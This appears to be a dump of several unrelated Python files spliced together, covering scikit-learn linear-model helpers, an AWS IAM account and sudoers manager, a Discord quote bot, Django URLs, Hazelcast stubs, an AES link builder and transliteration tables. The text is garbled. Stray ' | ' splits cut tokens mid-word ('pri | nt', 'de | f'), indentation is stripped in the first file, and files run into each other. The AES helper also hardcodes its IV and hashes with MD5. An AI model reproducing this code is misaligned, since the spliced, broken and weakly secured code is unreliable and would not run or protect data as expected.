# Lars Buitinck <L.J.Buitinck@uva.nl>
#
# License: BSD 3 clause
from __future__ import division
from abc import ABCMeta, abstractmethod
import numbers
import warnings
import numpy as np
import scipy.sparse as sp
from scipy import linalg
from scipy import sparse
from ..externals import six
from ..externals.joblib import Parallel, delayed
from ..base import BaseEstimator, ClassifierMixin, RegressorMixin
from ..utils import as_float_array, check_array, check_X_y, deprecated, column_or_1d
from ..utils.extmath import safe_sparse_dot
from ..utils.sparsefuncs import mean_variance_axis, inplace_column_scale
from ..utils.fixes import sparse_lsqr
from ..utils.validation import NotFittedError, check_is_fitted
###
### TODO: intercept for all models
### We should define a common function to center data instead of
### repeating the same code inside each fit method.
### TODO: bayesian_ridge_regression and bayesian_regression_ard
### should be squashed into its respective objects.
def sparse_center_data(X, y, fit_intercept, normalize=False):
"""
Compute information needed to center data to have mean zero along
axis 0. Be aware that X will not be centered since it would break
the sparsity, but will be normalized if asked so.
"""
if fit_intercept:
# we might require not to change the csr matrix sometimes
# store a copy if normalize is True.
# Change dtype to float64 since mean_variance_axis accepts
# it that way.
if sp.isspmatrix(X) and X.getformat() == 'csr':
X = sp.csr_matrix(X, copy=normalize, dtype=np.float64)
else:
X = sp.csc_matrix(X, copy=normalize, dtype=np.float64)
X_mean, X_var = mean_variance_axis(X, axis=0)
if normalize:
# transform variance to std in-place
# XXX: currently scaled to variance=n_samples to match center_data
X_var *= X.shape[0]
X_std = np.sqrt(X_var, X_var)
del X_var
X_std[X_std == 0] = 1
inplace_column_scale(X, 1. / X_std)
else:
X_std = np.ones(X.shape[1])
y_mean = y.mean(axis=0)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def center_data(X, y, fit_intercept, normalize=False, copy=True,
sample_weight=None):
"""
Centers data to have mean zero along axis 0. This is here because
nearly all linear models will want their data to be centered.
If sample_weight is not None, then the weighted mean of X and y
is zero, and not the mean itself
"""
X = as_float_array(X, copy)
if fit_intercept:
if isinstance(sample_weight, numbers.Number):
sample_weight = None
if sp.issparse(X):
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
else:
X_mean = np.average(X, axis=0, weights=sample_weight)
X -= X_mean
if normalize:
# XXX: currently scaled to variance=n_samples
X_std = np.sqrt(np.sum(X ** 2, axis=0))
X_std[X_std == 0] = 1
X /= X_std
else:
X_std = np.ones(X.shape[1])
y_mean = np.average(y, axis=0, weights=sample_weight)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def _rescale_data(X, y, sample_weight):
"""Rescale data so as to support sample_weight"""
n_samples = X.shape[0]
sample_weight = sample_weight * np.ones(n_samples)
sample_weight = np.sqrt(sample_weight)
sw_matrix = sparse.dia_matrix((sample_weight, 0),
shape=(n_samples, n_samples))
X = safe_sparse_dot(sw_matrix, X)
y = safe_sparse_dot(sw_matrix, y)
return X, y
class LinearModel(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for Linear Models"""
@abstractmethod
def fit(self, X, y):
"""Fit model."""
@deprecated(" and will be removed in 0.19.")
def decision_function(self, X):
"""Decision function of the linear model.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
| Returns predicted values.
"""
return self._decision_function(X)
def _decision_function(self, X):
check_is_fitted(self, "coef_")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
return safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matri | x}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
Returns predicted values.
"""
return self._decision_function(X)
_center_data = staticmethod(center_data)
def _set_intercept(self, X_mean, y_mean, X_std):
"""Set the intercept_
"""
if self.fit_intercept:
self.coef_ = self.coef_ / X_std
self.intercept_ = y_mean - np.dot(X_mean, self.coef_.T)
else:
self.intercept_ = 0.
# XXX Should this derive from LinearModel? It should be a mixin, not an ABC.
# Maybe the n_features checking can be moved to LinearModel.
class LinearClassifierMixin(ClassifierMixin):
"""Mixin for linear classifiers.
Handles prediction for sparse and dense X.
"""
def decision_function(self, X):
"""Predict confidence scores for samples.
The confidence score for a sample is the signed distance of that
sample to the hyperplane.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
array, shape=(n_samples,) if n_classes == 2 else (n_samples, n_classes)
Confidence scores per (sample, class) combination. In the binary
case, confidence score for self.classes_[1] where >0 means this
class would be predicted.
"""
if not hasattr(self, 'coef_') or self.coef_ is None:
raise NotFittedError("This %(name)s instance is not fitted "
"yet" % {'name': type(self).__name__})
X = check_array(X, accept_sparse='csr')
n_features = self.coef_.shape[1]
if X.shape[1] != n_features:
raise ValueError("X has %d features per sample; expecting %d"
% (X.shape[1], n_features))
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel() if scores.shape[1] == 1 else scores
def predict(self, X):
"""Predict class labels for samples in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Samples.
Returns
-------
C : array, shape = [n_samples]
Predicted class label per sample.
"""
scores = self.decision_function(X)
if len(scores.shape) == 1:
indices = (scores > 0).astype(np.int)
else:
indices = scores.argmax(axis=1)
return self.classes_[indices]
def _predict_proba_ |
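# `center_data()` above removes the (optionally weighted) mean from X and y
# so that the intercept can be recovered afterwards, exactly as
# `_set_intercept` does. A minimal unweighted NumPy sketch of that round
# trip (assumes dense X and no normalization):
import numpy as np
X = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]])
y = np.array([1.0, 2.0, 3.0])
X_mean, y_mean = X.mean(axis=0), y.mean()
Xc, yc = X - X_mean, y - y_mean               # centered copies
coef = np.linalg.lstsq(Xc, yc, rcond=None)[0]
intercept = y_mean - X_mean.dot(coef)         # same formula as _set_intercept
assert np.allclose(X.dot(coef) + intercept, y)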
Demeterr/iam_acctmgr | iam_acctmgr.py | Python | apache-2.0 | 13,615 | 0.00022 | # Copyright 2015 Bebop Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'Integrate AWS IAM with PAM, the Name Service Switch, and SSH'
from __future__ import print_function
import argparse
import datetime
import json
import logging
import os
import pwd
import re
import spwd
import subprocess
import sys
import tempfile
import time
import traceback
import botocore.session
# Requires botocore>=1.0 but Jessie is on an ancient version
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=798015
LOG = logging.getLogger('iam_acctmgr')
EPOCH = datetime.datetime.utcfromtimestamp(0)
IAM_POLLING_INTERVAL = int(os.getenv('IAM_ACCTMGR_POLL_INTERVAL', 60))
MIN_USER_UID = int(os.getenv('IAM_ACCTMGR_MIN_USER_UID', 10000))
MAX_USER_UID = int(os.getenv('IAM_ACCTMGR_MAX_USER_UID', 19999))
IAM_PUB_KEY_FILE = '/etc/iam-pub-ssh-keys'
IAM_GROUP = os.getenv('IAM_ACCTMGR_GROUP')
EXTRAUSERS_PASSWD = '/var/lib/extrausers/passwd'
EXTRAUSERS_SHADOW = '/var/lib/extrausers/shadow'
SUDOERS_CONFIG = '/etc/sudoers.d/90-aws-iam-admin'
assert MAX_USER_UID > MIN_USER_UID
# UID Policies:
#
# Debian: https://www.debian.org/doc/manuals/system-administrator/ch-sysadmin-users.html
def is_iam_user(user):
'Is the UID of a ``pwd.struct_passwd`` within the range of IAM users?'
return user.pw_uid >= MIN_USER_UID and user.pw_uid <= MAX_USER_UID
def authorized_keys_command(username=None,
pub_keys_file=IAM_PUB_KEY_FILE,
out_fd=None):
'''Print the SSH public keys associated with a username.
This function reads from a file with a JSON payload generated from
``fetch_keys()``.
See AuthorizedKeysCommand section of the OpenSSH manual.
'''
username = username or sys.argv[1]
out_fd = out_fd or sys.stdout
with open(pub_keys_file) as keyfd:
keys = json.loads(keyfd.read())
for key in keys[username]:
print(key.strip(), file=out_fd)
def fetch_keys(group_name):
'''Fetch SSH keys associated with all *active* users of an IAM group.
This relies on a new SSH Public Key metadata feature recently added to AWS
IAM. Note that the AWS documentation currently only mentions this feature
in the context of their CodeCommit product but the API naming itself has no
such context. See:
https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetSSHPublicKey.html
https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListSSHPublicKeys.html
:type group_name: str
:param group_name: The IAM group from which to create the extra users.
'''
session = botocore.session.get_session()
iam = session.create_client('iam')
try:
        members = iam.get_group(GroupName=group_name)
    except Exception:
LOG.error('Error trying to retrieve IAM group %s', group_name)
raise
result = {}
for user in members['Users']:
username = user['UserName']
result[username] = []
for key in iam.list_ssh_public_keys(UserName=username)['SSHPublicKeys']:
if 'Active' != key['Status']:
continue
ssh_pub = iam.get_ssh_public_key(
UserName=username,
SSHPublicKeyId=key['SSHPublicKeyId'],
Encoding='SSH')['SSHPublicKey']['SSHPublicKeyBody']
result[username].append(ssh_pub)
# Ensure stable ordering
result[username].sort()
return result
def filter_keys(user_pks, system_names):
'Filter out invalid user(name)s'
result = {}
# Only accept posix compliant usernames.
# https://serverfault.com/questions/73084/
name_regex = re.compile(r'^[_.A-Za-z0-9][-_.A-Za-z0-9]*$')
for username, pks in user_pks.items():
if name_regex.match(username) is None:
LOG.warning('Skipping invalid user name %s', username)
continue
if username in system_names:
LOG.warning('Skipping IAM user %s due to matching system user',
username)
continue
if len(pks) < 1:
LOG.warning('Skipping IAM user %s with no public keys',
username)
continue
result[username] = pks
return result
def passwd_to_line(struct):
'Map an instance of ``pwd.struct_passwd`` to a byte-string.'
return ':'.join(str(x) for x in struct).encode('utf-8')
def shadow_to_line(struct):
'Map an instance of ``spwd.struct_spwd`` to a byte-string.'
return ':'.join('' if isinstance(x, int) and x < 0 else str(x)
for x in struct).encode('utf-8')
def process(user_pks, pwall, spwall):
'''Generate the passwd, shadow, and sudo fragments for IAM users.
:param user_pks: Mapping of username (``str``) to public keys (``list`` of
``str``) retrieved from IAM.
:type user_pks: dict
:param pwall: A list of ``pwd.struct_passwd`` including all password
entries found by NSS. Should include those users identified
by libnss-extrausers.
:type pwall: list
    :param spwall: A list of ``spwd.struct_spwd`` with the shadow entries
                   corresponding to ``pwall``.
    :type spwall: list
    '''
username_index = dict(
(user.pw_name, user) for user in pwall if is_iam_user(user))
susername_index = dict(
(user[0], user) for user in | spwall
if user[0] in username_index)
uid_index = dict((int(user.pw_uid), user) for user in pwall)
next_uid = MIN_USER_UID
passwd, shadow, sudo = [], [], []
    # Users that | have been removed from IAM will keep their UIDs reserved in
    # the event that they are later re-added. In practice, I don't anticipate this behavior
# to be problematic since there is an abundance of UIDs available in the
# default configuration UID range for all but the largest admin user pools.
for old_username in set(username_index.keys()) - set(user_pks.keys()):
passwd.append(username_index[old_username])
shadow.append(susername_index[old_username])
for username in user_pks.keys():
# Find the next gap in user IDs
while next_uid in uid_index:
next_uid += 1
if next_uid > MAX_USER_UID:
LOG.error("User limit reached! Skipping user %s", username)
break
sudo.append('{} ALL=(ALL) NOPASSWD:ALL'.format(username))
if username in username_index:
passwd.append(username_index[username])
shadow.append(susername_index[username])
else:
passwd.append(pwd.struct_passwd((
username,
'x',
next_uid,
next_uid,
'IAM-USER',
'/home/{}'.format(username),
'/bin/bash',
)))
shadow.append(spwd.struct_spwd((
username,
'*',
(datetime.datetime.utcnow() - EPOCH).days,
0,
99999,
7,
-1,
-1,
-1,
)))
next_uid += 1
sudo.sort()
sudo.insert(0, '# Created by {} on {}'.format(
__file__,
datetime.datetime.utcnow().ctime()))
return (
sorted(passwd_to_line(x) for x in passwd),
sorted(shadow_to_line(x) for x in shadow),
[x.encode('utf-8') for x in sudo]
)
def write(lines, target, permissions='0644'):
'''Write a sequence of byte strings to a file as individual lines.
This function first stages the file in a temporary directory.
'''
with tempfile.NamedTemporaryFile(delete=False) as staging:
for line in lines:
staging.write(line)
staging.write(b'\n')
subprocess.check_call(
('install' |
IIIIIIIIll/sdy_notes_liaoxf | LiaoXueFeng/as_IO/async_await.py | Python | gpl-3.0 | 325 | 0.006154 | import threading
import asyncio
async def hello():
print('Hello world! (%s)' % threading.currentThread())
await asyncio.sleep(1)
pri | nt('Hello again! (%s)' % threading.currentThread())
loop = asyncio.get_event_loop()
tasks = [hello(), hello()]
loop.run_until_complete(asyncio.wait(tasks))
loop.close() | |
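# The same program in the asyncio style current since Python 3.7: let
# `asyncio.run()` own the event loop and use `gather` instead of the
# lower-level `wait` (equivalent behavior for the `hello()` coroutine
# defined above; sketch only):
async def main():
    await asyncio.gather(hello(), hello())
asyncio.run(main())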
selenized/clausius | clausius/eos/basicmixing.py | Python | unlicense | 877 | 0.003421 | import numpy as np
__all__ = ['vanDerWaalsMixing']
def vanDerWaalsMixing(kij=0):
"""Simple van der Waals mixing rules, returns a mixingrule function.
kij is an numpy array of binary interaction parameters"""
def vdw_mixing(molefraction, theta, TdthetadT, B, delta=None, epsilon=None, eta=None):
"""Takes molefraction, theta, T*dtheta/dT, B and returns mixed values
theta | _m, T*dtheta/dT_m, dtheta/dn, B_b, dB/dn"""
theta_ij = (1 - kij) * np.sqrt(np.outer(theta, theta))
dtheta_m = np.dot(molefraction, theta_ij)
B_m = np.dot(molefraction, B)
TdthetadT_ij = 0.5 * (1 - kij) * np.outer(theta, theta)**-0.5 * (np.outer(TdthetadT, theta) + np.outer(theta, TdthetadT,))
return np.dot(molefraction, dtheta_m), np.dot(molefraction, np.dot(TdthetadT_ij, molefraction)), | 2 * dtheta_m, B_m, B
return vdw_mixing
|
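# A quick numerical check of `vanDerWaalsMixing` above for an equimolar
# binary mixture with kij = 0, where theta_m should collapse to
# (sum_i x_i * sqrt(theta_i))**2 and B_m to the mole-fraction average.
# (Sketch; T*dtheta/dT is set to zero for brevity.)
mix = vanDerWaalsMixing(kij=np.zeros((2, 2)))
x = np.array([0.5, 0.5])
theta = np.array([1.0, 4.0])
B = np.array([0.1, 0.2])
theta_m, TdthetadT_m, dtheta_dn, B_m, dB_dn = mix(x, theta, np.zeros(2), B)
assert np.isclose(theta_m, (x.dot(np.sqrt(theta))) ** 2)  # (0.5*1 + 0.5*2)**2
assert np.isclose(B_m, 0.15)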
hazelcast-incubator/pyhzclient | hzclient/codec/transactionalmultimapcodec.py | Python | apache-2.0 | 1,449 | 0.024845 | __author__ = 'Jonathan Brodie'
import ctypes
from hzclient.clientmessage import ClientMessage
from util import util
'''
PUT
'''
de | f putEncode():
msg=ClientMessage()
msg.optype=0x1101
util.rais | eNotDefined()
def putDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
GET
'''
def getEncode():
msg=ClientMessage()
msg.optype=0x1102
util.raiseNotDefined()
def getDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
REMOVE
'''
def removeEncode():
msg=ClientMessage()
msg.optype=0x1103
util.raiseNotDefined()
def removeDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
REMOVEENTRY
'''
def removeentryEncode():
msg=ClientMessage()
msg.optype=0x1104
util.raiseNotDefined()
def removeentryDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
VALUECOUNT
'''
def valuecountEncode():
msg=ClientMessage()
msg.optype=0x1105
util.raiseNotDefined()
def valuecountDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
SIZE
'''
def sizeEncode():
msg=ClientMessage()
msg.optype=0x1106
util.raiseNotDefined()
def sizeDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined() |
vladan-m/ggrc-core | src/ggrc/models/section_objective.py | Python | apache-2.0 | 1,173 | 0.01364 | # Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: dan@reciprocitylabs.com
from ggrc import db
from .mixins import | Mapping
class SectionObjective(Mapping, db.Model):
__tablename__ = 'section_objectives'
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('section_id', 'objective_id'),
db.Index('ix_section_id', 'section_id'),
db.Index('ix_objective_id', 'objective_id'),
)
section_id = db.Column(db.Integer, db.ForeignKey('sections.id'), nullable = False)
objective_id = db.Column(db.Integer, db.ForeignKey('objectives.id'), nullable = False)
_publish_a | ttrs = [
'section',
'objective',
]
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(SectionObjective, cls).eager_query()
return query.options(
orm.subqueryload('section'),
orm.subqueryload('objective'))
def _display_name(self):
return self.section.display_name + '<->' + self.objective.display_name
|
ministryofjustice/cla_backend | cla_backend/apps/reports/urls.py | Python | mit | 2,339 | 0.005558 | from django.conf.urls import patterns, url
from . import views
from . import api
urlpatterns = patterns(
"",
url(r"^api/exports/$", api.ExportListView.as_view(), name="exports"),
url(r"^api/exports/scheduled/$", api.ExportListView.as_view(scheduled=True), name="scheduled"),
url(r"^api/exports/(?P<pk>[0-9]+)/$", api.ExportListView.as_view(), name="exports"),
url(r"^exports/download/(?P<file_name>[A-Za-z0-9-_\.]+)$", views.download_file, name="exports"),
url(
r"^mi-provider-allocation-extract/$",
views.mi_provider_allocation_extract,
name="mi_provider_allocation_extract",
),
url(r"^mi-case-extract/$", views.mi_case_extract, name="mi_case_extract"),
url(
r"^mi-case-view-audit-log-extract/$",
views.mi_case_view_audit_log_extract,
name="mi_case_view_audit_log_extract", |
),
url(
r"^mi-complaint-view-audit-log-extract/$",
views.mi_complaint_view_audit_log_extract,
name="mi_complaint_view_audit_log_extract",
),
url(r"^mi-feedback-e | xtract/$", views.mi_feedback_extract, name="mi_feedback_extract"),
url(r"^mi-duplicate-case-extract/$", views.mi_duplicate_case_extract, name="mi_duplicate_case_extract"),
url(r"^mi-contacts-per-case-extract/$", views.mi_contacts_extract, name="mi_contacts_extract"),
url(r"^mi-alternative-help-extract/$", views.mi_alternative_help_extract, name="mi_alternative_help_extract"),
url(r"^mi-survey-extract/$", views.mi_survey_extract, name="mi_survey_extract"),
url(r"^mi-cb1-extract/$", views.mi_cb1_extract, name="mi_cb1_extract"),
url(r"^mi-cb1-extract-agilisys/$", views.mi_cb1_extract_agilisys, name="mi_cb1_extract_agilisys"),
url(r"^mi-voice-extract/$", views.mi_voice_extract, name="mi_voice_extract"),
url(r"^mi-digital-case-type-extract/$", views.mi_digital_case_type_extract, name="mi_digital_case_type_extract"),
url(r"^mi-eod-extract/$", views.mi_eod_extract, name="mi_eod_extract"),
url(r"^mi-comlpaints/$", views.mi_complaints, name="mi_complaints"),
url(r"^mi-obiee-extract/$", views.mi_obiee_extract, name="mi_obiee_extract"),
url(r"^metrics-report/$", views.metrics_report, name="metrics_report"),
url(r"^all-knowledgebase-articles/$", views.all_knowledgebase_articles, name="all_knowledgebase_articles"),
)
|
slice/dogbot | dog/ext/quoting/cog.py | Python | mit | 7,284 | 0.000412 | import datetime
import time
from random import choice
import discord
import lifesaver
from discord.ext import commands
from lifesaver.bot.storage import AsyncJSONStorage
from lifesaver.utils import (
ListPaginator,
clean_mentions,
human_delta,
pluralize,
truncate,
)
from .converters import Messages, QuoteName
from .utils import stringify_message
__all__ = ["Quoting"]
def embed_quote(quote) -> discord.Embed:
embed = discord.Embed()
embed.description = quote["content"]
embed.add_field(name="Jump", value=quote["jump_url"], inline=False)
creator = quote["created_by"]["tag"]
channel = quote["created_in"]["name"]
ago = human_delta(datetime.datetime.utcfromtimestamp(quote["created"]))
embed.set_footer(text=f"Created by {creator} in #{channel} {ago} ago")
return embed
class Quoting(lifesaver.Cog):
def __init__(self, bot, *args, **kwargs):
super().__init__(bot, *args, **kwargs)
self.storage = AsyncJSONStorage("quotes.json", loop=bot.loop)
def qu | otes(self, guild: discord.Guild):
return self.storage.get(str(guild.id), {})
@lifesaver.command(aliases=["rq"])
@commands.guild_only()
async def random_quote(self, ctx):
"""Shows a random quote."""
| quotes = self.quotes(ctx.guild)
if not quotes:
await ctx.send(
"There are no quotes in this server. Create some with "
f"`{ctx.prefix}quote new`. For more information, see `{ctx.prefix}"
"help quote`."
)
return
(name, quote) = choice(list(quotes.items()))
embed = embed_quote(quote)
name = clean_mentions(ctx.channel, name)
await ctx.send(name, embed=embed)
@lifesaver.group(aliases=["q"], invoke_without_command=True)
@commands.guild_only()
async def quote(self, ctx, *, name: QuoteName(must_exist=True)):
"""Views a quote.
        A quote is essentially a snapshot of one or more messages that I
        store in my database.
You can specify multiple message IDs to store:
d?quote new "my quote" 467753625024987136 467753572633673773 ...
Alternatively, you can specify a message ID then a number of messages
to store after that, like:
d?quote new "my quote" 467753625024987136+5
That would store message 467753625024987136 and the 5 messages after
that. You can also combine them if you would like to simultaneously
specify individual messages and groups of messages. Alternatively,
you can select the last 5 messages like so:
d?quote new "my quote" :-5
        The :-n or +n (called the "range") will grab up to 50 messages both ways.
Your quote's content has a length limit of 2048, Discord's embed
description limit. You will be prompted to confirm if your created
quote goes over this limit.
To read a quote, just specify its name, and no message IDs:
d?quote my quote
The number of embeds in any message (if any) and any attachment URLs
are preserved. Additionally, quotes contain a jump URL to jump to the
first message in the quote directly with your client.
If you want to create a quote without having the quote echo in chat,
prefix the quote name with "!":
d?quote !quote 467753625024987136+3
The bot will DM you the quote instead of echoing it in chat, and no
feedback will be provided in the channel. Keep in mind that the name of
the created quote will not have the "!".
Quotes contain the following data:
- All message content, all numbers of embeds, all attachment URLs
- Channel ID and name, first message ID, guild ID
- Creation timestamp
- Quote creator ID and username#discriminator
"""
quotes = self.quotes(ctx.guild)
quote = quotes.get(name)
embed = embed_quote(quote)
await ctx.send(embed=embed)
@quote.command(aliases=["new"])
@commands.guild_only()
async def create(
self, ctx, name: QuoteName(must_not_exist=True), *messages: Messages
):
"""Creates a quote.
See `d?help quote` for more information.
"""
quotes = self.quotes(ctx.guild)
silent = name.startswith("!")
if silent:
# Remove the !
name = name[1:]
# the converter can return multiple messages if a range is specified
quoted = []
for message in messages:
if isinstance(message, list):
quoted += message
else:
quoted.append(message)
strings = map(stringify_message, quoted)
quote_content = "\n".join(strings)
if len(quote_content) > 2048:
over_limit = pluralize(character=len(quote_content) - 2048)
if not await ctx.confirm(
"Quote is quite large...",
(
f"This quote is pretty big. ({over_limit} over limit.) "
"It will be truncated to 2048 characters. Continue?"
),
):
return
quote = quotes[name] = {
"content": truncate(quote_content, 2048),
"jump_url": quoted[0].jump_url,
"created": time.time(),
"created_by": {"id": ctx.author.id, "tag": str(ctx.author)},
"created_in": {"id": ctx.channel.id, "name": ctx.channel.name},
"guild": {"id": ctx.guild.id},
}
await self.storage.put(str(ctx.guild.id), quotes)
embed = embed_quote(quote)
await (ctx.author if silent else ctx).send(
f'Created quote "{name}".', embed=embed
)
@quote.command()
@commands.guild_only()
async def list(self, ctx):
"""Lists quotes on this server."""
quotes = self.quotes(ctx.guild)
if not quotes:
await ctx.send("No quotes exist for this server.")
return
tag_names = [clean_mentions(ctx.channel, name) for name in quotes.keys()]
paginator = ListPaginator(
tag_names,
ctx.author,
ctx.channel,
title="All quotes",
per_page=20,
bot=ctx.bot,
)
await paginator.create()
@quote.command()
@commands.guild_only()
@commands.has_permissions(manage_messages=True)
async def rename(
self,
ctx,
existing: QuoteName(must_exist=True),
new: QuoteName(must_not_exist=True),
):
"""Renames a quote."""
quotes = self.quotes(ctx.guild)
quotes[new] = quotes[existing]
del quotes[existing]
await self.storage.put(str(ctx.guild.id), quotes)
await ctx.send(f'Quote "{existing}" was renamed to "{new}".')
@quote.command()
@commands.guild_only()
@commands.has_permissions(manage_messages=True)
async def delete(self, ctx, *, quote: QuoteName(must_exist=True)):
"""Deletes a quote."""
quotes = self.quotes(ctx.guild)
del quotes[quote]
await self.storage.put(str(ctx.guild.id), quotes)
await ctx.ok()
|
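# The `d?quote new` syntax documented above accepts bare message IDs plus
# two range forms, "<id>+n" and ":-n". A hypothetical standalone parser for
# those tokens (the real `Messages` converter also fetches the messages and
# caps ranges at 50, which is mirrored here):
import re
def parse_token(token, cap=50):
    m = re.fullmatch(r'(\d+)\+(\d+)', token)
    if m:
        return ('after', int(m.group(1)), min(int(m.group(2)), cap))
    m = re.fullmatch(r':-(\d+)', token)
    if m:
        return ('last', min(int(m.group(1)), cap))
    if re.fullmatch(r'\d+', token):
        return ('id', int(token))
    raise ValueError('bad message token: ' + token)
assert parse_token('467753625024987136+5') == ('after', 467753625024987136, 5)
assert parse_token(':-5') == ('last', 5)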
SequencingDOTcom/App-Market-API-integration | python/external/sequencing/utils/connect.py | Python | mit | 1,174 | 0.005963 | import base64
import urllib
import hashlib
import json
from Crypto.Cipher import AES
from external.sequencing.config import SequencingEndpoints
class AESCipher:
def __init__(self, key, iv):
self.key = key[:32]
self.iv = iv[:16]
__pad = lambda self,s: s + (AES.block_size - len(s) % AES.block_siz | e) * chr(AES.block_size - len(s) % AES.block_size)
__unpad = lambda self,s: s[0:-ord(s[-1])]
def encrypt(self, raw):
raw = self.__pad(raw)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
return base64.b64encode | (cipher.encrypt(raw))
def decrypt(self, enc):
enc = base64.b64decode(enc)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
return self.__unpad(cipher.decrypt(enc).decode("utf-8"))
def get_connect_to_link(data, url=SequencingEndpoints.connect_to):
    password = data['client_id']
cipher = AESCipher(password, '3n3CrwwnzMqxOssv')
payload = json.dumps(data)
enc_str = cipher.encrypt(payload)
get_vars = {
'c': hashlib.md5(password).hexdigest(),
'json': urllib.quote(enc_str.encode('utf-8'))
}
return url + urllib.urlencode(get_vars)
|
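# `AESCipher` above is AES-CBC with PKCS#7-style padding, so encrypt and
# decrypt should round-trip any payload. A quick check (Python 2 with
# PyCrypto, matching the imports above; the key and IV are throwaway test
# values, not real credentials):
cipher = AESCipher('0' * 32, '1' * 16)
token = cipher.encrypt('{"client_id": "demo"}')
assert cipher.decrypt(token) == '{"client_id": "demo"}'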
shreevatsa/sanskrit | transliteration/transliterate.py | Python | gpl-2.0 | 8,647 | 0.008235 | # -*- coding: utf-8 -*-
"""Transliteration data."""
from __future__ import absolute_import, division, print_function, unicode_literals
try: unicode
except NameError: unicode = str
import slp1
from transliteration.detect import TRANSLITERATION_SCHEME
from transliteration import devanagari
from transliteration.transliteration_data import KANNADA_CONSONANTS
from transliteration import transliterator
_DEFAULT_PASS_THROUGH = ' -?'
def _AlphabetToSLP1(alphabet):
"""Table to SLP1, given a transliteration's alphabet in standard order."""
return dict(zip(alphabet, slp1.ALPHABET))
def _SLP1ToAlphabet(alphabet):
return dict(zip(slp1.ALPHABET, alphabet))
_HK_ALPHABET = (list('aAiIuUR') + ['RR', 'lR', 'lRR', 'e', 'ai', 'o', 'au'] +
['M', 'H',
'k', 'kh', 'g', 'gh', 'G',
'c', 'ch', 'j', 'jh', 'J',
'T', 'Th', 'D', 'Dh', 'N',
't', 'th', 'd', 'dh', 'n',
'p', 'ph', 'b', 'bh', 'm'] +
list('yrlvzSsh'))
_HK_TO_SLP1_STATE_MACHINE = transliterator.MakeStateMachine(
_AlphabetToSLP1(_HK_ALPHABET))
_IAST_ALPHABET_LOWER = (list('aāiīuūṛṝḷḹe') + ['ai', 'o', 'au', 'ṃ', 'ḥ'] +
['k', 'kh', 'g', 'gh', 'ṅ',
'c', 'ch', 'j', 'jh', 'ñ',
'ṭ', 'ṭh', 'ḍ', 'ḍh', 'ṇ',
't', 'th', 'd', 'dh', 'n',
'p', 'ph', 'b', 'bh', 'm',
'y', 'r', 'l', 'v', 'ś', 'ṣ', 's', 'h'])
_IAST_ALPHABET_UPPER = (list('AĀIĪUŪṚṜḶḸE') + ['AI', 'O', 'AU', 'Ṃ', 'Ḥ'] +
['K', 'Kh', 'G', 'Gh', 'Ṅ',
'C', 'Ch', 'J', 'Jh', 'Ñ',
'Ṭ', 'Ṭh', 'Ḍ', 'Ḍh', 'Ṇ',
'T', 'Th', 'D', 'Dh', 'N',
'P', 'Ph', 'B', 'Bh', 'M',
'Y', 'R', 'L', 'V', 'Ś', 'Ṣ', 'S', 'H'])
def _IASTToSLP1StateMachine():
"""Transliteration table from IAST to SLP1."""
lower = _AlphabetToSLP1(_IAST_ALPHABET_LOWER)
upper = _AlphabetToSLP1(_IAST_ALPHABET_UPPER)
lower.update(upper)
return transliterator.MakeStateMachine(lower)
_IAST_TO_SLP1_STATE_MACHINE = _IASTToSLP1Sta | teMachine()
_SLP1_TO_IAST_STATE_MACHINE = transliterator.MakeStateMachine(
_SLP1To | Alphabet(_IAST_ALPHABET_LOWER))
_ITRANS_ALPHABET = (['a', 'aa', 'i', 'ii', 'u', 'uu', 'RRi', 'RRI',
'LLi', 'LLI', 'e', 'ai', 'o', 'au', 'M', 'H',
'k', 'kh', 'g', 'gh', '~N',
'ch', 'Ch', 'j', 'jh', '~n',
'T', 'Th', 'D', 'Dh', 'N',
't', 'th', 'd', 'dh', 'n',
'p', 'ph', 'b', 'bh', 'm',
'y', 'r', 'l', 'v', 'sh', 'Sh', 's', 'h'])
def _ITRANSToSLP1StateMachine():
